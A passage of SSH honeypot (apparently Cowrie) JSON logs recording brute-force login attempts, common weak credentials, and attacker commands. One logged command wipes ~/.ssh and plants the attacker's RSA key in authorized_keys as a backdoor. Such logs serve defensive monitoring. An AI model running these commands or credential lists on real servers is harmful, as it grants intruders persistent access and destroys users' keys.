AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:43:48.513786Z","src_ip":"93.113.63.124","session":"8c7b0f1ef8fd"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:43:48.586064Z","src_ip":"93.113.63.124","session":"8c7b0f1ef8fd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:43:48.587060Z","src_ip":"93.113.63.124","session":"8c7b0f1ef8fd"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":41076,"dst_ip":"1.2.3.4","dst_port":22,"session":"035053bbe081","protocol":"ssh","message":"New connection: 93.113.63.124:41076 (1.2.3.4:22) [session: 035053bbe081]","sensor":"my-vps","timestamp":"2025-09-08T23:43:48.696127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:43:48.702247Z","src_ip":"93.113.63.124","session":"035053bbe081"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:43:48.760196Z","src_ip":"93.113.63.124","session":"035053bbe081"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:43:49.043014Z","src_ip":"93.113.63.124","session":"035053bbe081"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:43:50.104204Z","src_ip":"93.113.63.124","session":"035053bbe081"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":41080,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecb5d88259be","protocol":"ssh","message":"New connection: 93.113.63.124:41080 (1.2.3.4:22) [session: ecb5d88259be]","sensor":"my-vps","timestamp":"2025-09-08T23:43:50.163589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:43:50.188456Z","src_ip":"93.113.63.124","session":"ecb5d88259be"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:43:50.248311Z","src_ip":"93.113.63.124","session":"ecb5d88259be"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:43:50.539575Z","src_ip":"93.113.63.124","session":"ecb5d88259be"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:43:50.650135Z","src_ip":"93.113.63.124","session":"ecb5d88259be"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:43:50.660215Z","src_ip":"93.113.63.124","session":"8c7b0f1ef8fd"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":43534,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad42cbb4833c","protocol":"ssh","message":"New connection: 46.101.8.63:43534 (1.2.3.4:22) [session: ad42cbb4833c]","sensor":"my-vps","timestamp":"2025-09-08T23:43:56.005137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:43:56.005911Z","src_ip":"46.101.8.63","session":"ad42cbb4833c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:43:56.027513Z","src_ip":"46.101.8.63","session":"ad42cbb4833c"}
{"eventid":"cowrie.login.failed","username":"audit","password":"Welcome1","message":"login attempt [audit/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T23:43:56.155990Z","src_ip":"46.101.8.63","session":"ad42cbb4833c"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:43:57.179343Z","src_ip":"46.101.8.63","session":"ad42cbb4833c"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":51644,"dst_ip":"1.2.3.4","dst_port":22,"session":"a77de66e9428","protocol":"ssh","message":"New connection: 45.150.34.92:51644 (1.2.3.4:22) [session: a77de66e9428]","sensor":"my-vps","timestamp":"2025-09-08T23:44:15.497401Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:44:15.498331Z","src_ip":"45.150.34.92","session":"a77de66e9428"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:44:15.515657Z","src_ip":"45.150.34.92","session":"a77de66e9428"}
{"eventid":"cowrie.login.failed","username":"db2fenc1","password":"Password","message":"login attempt [db2fenc1/Password] failed","sensor":"my-vps","timestamp":"2025-09-08T23:44:15.627775Z","src_ip":"45.150.34.92","session":"a77de66e9428"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:44:16.647075Z","src_ip":"45.150.34.92","session":"a77de66e9428"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":54140,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a3bf05411e2","protocol":"ssh","message":"New connection: 182.18.161.165:54140 (1.2.3.4:22) [session: 3a3bf05411e2]","sensor":"my-vps","timestamp":"2025-09-08T23:44:52.591295Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:44:52.592047Z","src_ip":"182.18.161.165","session":"3a3bf05411e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:44:52.845325Z","src_ip":"182.18.161.165","session":"3a3bf05411e2"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":54022,"dst_ip":"1.2.3.4","dst_port":22,"session":"46ee78c753ec","protocol":"ssh","message":"New connection: 93.113.63.124:54022 (1.2.3.4:22) [session: 46ee78c753ec]","sensor":"my-vps","timestamp":"2025-09-08T23:44:53.158690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:44:53.170530Z","src_ip":"93.113.63.124","session":"46ee78c753ec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:44:53.241105Z","src_ip":"93.113.63.124","session":"46ee78c753ec"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql1234","message":"login attempt [mysql/mysql1234] failed","sensor":"my-vps","timestamp":"2025-09-08T23:44:53.601332Z","src_ip":"93.113.63.124","session":"46ee78c753ec"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa@123123","message":"login attempt [root/Aa@123123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:44:53.897235Z","src_ip":"182.18.161.165","session":"3a3bf05411e2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:44:54.465203Z","src_ip":"182.18.161.165","session":"3a3bf05411e2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:44:54.466097Z","src_ip":"182.18.161.165","session":"3a3bf05411e2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:44:54.467297Z","src_ip":"182.18.161.165","session":"3a3bf05411e2"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:44:54.675602Z","src_ip":"93.113.63.124","session":"46ee78c753ec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:44:54.721620Z","src_ip":"182.18.161.165","session":"3a3bf05411e2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:44:55.243846Z","src_ip":"182.18.161.165","session":"3a3bf05411e2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:44:55.244592Z","src_ip":"182.18.161.165","session":"3a3bf05411e2"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":40918,"dst_ip":"1.2.3.4","dst_port":22,"session":"af563d0e9033","protocol":"ssh","message":"New connection: 46.101.8.63:40918 (1.2.3.4:22) [session: af563d0e9033]","sensor":"my-vps","timestamp":"2025-09-08T23:44:55.246924Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:44:55.247553Z","src_ip":"46.101.8.63","session":"af563d0e9033"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:44:55.268881Z","src_ip":"46.101.8.63","session":"af563d0e9033"}
{"eventid":"cowrie.login.failed","username":"redis","password":"Password123","message":"login attempt [redis/Password123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:44:55.395825Z","src_ip":"46.101.8.63","session":"af563d0e9033"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:44:55.499287Z","src_ip":"182.18.161.165","session":"3a3bf05411e2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:44:55.500112Z","src_ip":"182.18.161.165","session":"3a3bf05411e2"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":54146,"dst_ip":"1.2.3.4","dst_port":22,"session":"196c9f5b9d09","protocol":"ssh","message":"New connection: 182.18.161.165:54146 (1.2.3.4:22) [session: 196c9f5b9d09]","sensor":"my-vps","timestamp":"2025-09-08T23:44:55.752843Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:44:55.753747Z","src_ip":"182.18.161.165","session":"196c9f5b9d09"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:44:56.007673Z","src_ip":"182.18.161.165","session":"196c9f5b9d09"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:44:56.419032Z","src_ip":"46.101.8.63","session":"af563d0e9033"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:44:57.066928Z","src_ip":"182.18.161.165","session":"196c9f5b9d09"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:44:58.323466Z","src_ip":"182.18.161.165","session":"196c9f5b9d09"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":37360,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff53556c8987","protocol":"ssh","message":"New connection: 182.18.161.165:37360 (1.2.3.4:22) [session: ff53556c8987]","sensor":"my-vps","timestamp":"2025-09-08T23:44:58.586250Z"}
